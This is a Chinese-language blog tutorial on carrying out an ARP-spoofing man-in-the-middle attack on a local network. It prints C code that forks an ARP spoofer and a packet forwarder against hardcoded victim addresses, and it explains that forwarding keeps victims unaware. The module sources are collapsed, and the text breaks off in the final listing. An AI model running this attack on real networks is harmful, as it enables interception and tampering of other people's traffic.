下面是整篇文章的鸟瞰图:(读者应该了解局域网ARP协议)
上图便是局域网中的中间人攻击的大概思想,下面给出具体的实现方法:
(备注:右键另存为 大图较清晰)
实现"中间人"的情景,有两个关键点:
· ARP欺骗:目的是将通信双方的数据包流经中间人。
· 数据包分析、篡改与转发:维持通信双发的通信链接不至于中断,以免对方警觉,这样才能顺利进行下一步的行动。
第一步:ArpSpoof
(备注:右键另存为 大图较清晰)
ArpSpoof模块的源码如下:
View Code
第二步:数据包分析、转发
这里仅转发IP数据包,于是,我们以较简单的icmp-request & icmp-reply 为例:
mitm-forwarder模块的源码如下:
View Code
第三步:
借助于进程的fork模型,将arpspoof与mitm-forwarder二者整合为一个接口:
void main()
{
uint8_t ip_A[4]={192,168,1,1};
uint8_t mac_A[6]={0x14,0xE6,0xE4,0x94,0xB4,0xD6};
uint8_t ip_B[4]={192,168,1,108};
uint8_t mac_B[6]={0x00,0x7B,0x05,0x03,0x8E,0x90};
uint8_t mac_M[6]={0x00,0x11,0x22,0x33,0x44,0x55};
//BPF_filterStr: ether dst mac_M and ip
char * BPF_filterStr=" ether dst 00:11:22:33:44:55 and ip ";
char * devMitm="eth0";
//local
pid_t sonPid;
sonPid=fork();
if( sonPid==-1 )
{//failure
printf("failure:mitm fork error :( \n");
}
else if(sonPid==0)
{//child
printf("child : pid:%d:)\n",getpid());
ArpSpoof( ip_A,mac_A,ip_B,mac_B,mac_M,devMitm );
}
else
{//parent
printf("parent: pid:%d sonPid:%d :)\n",getpid(),sonPid);
sleep(2);
mitm_forwarder(
ip_A,mac_A,
ip_B,mac_B,
mac_M,BPF_filterStr,
devMitm
);
}
}
如此,最终代码如下:
#include<unistd.h>
#include<pcap.h>
#include<time.h>
#include<stdio.h>
#inclu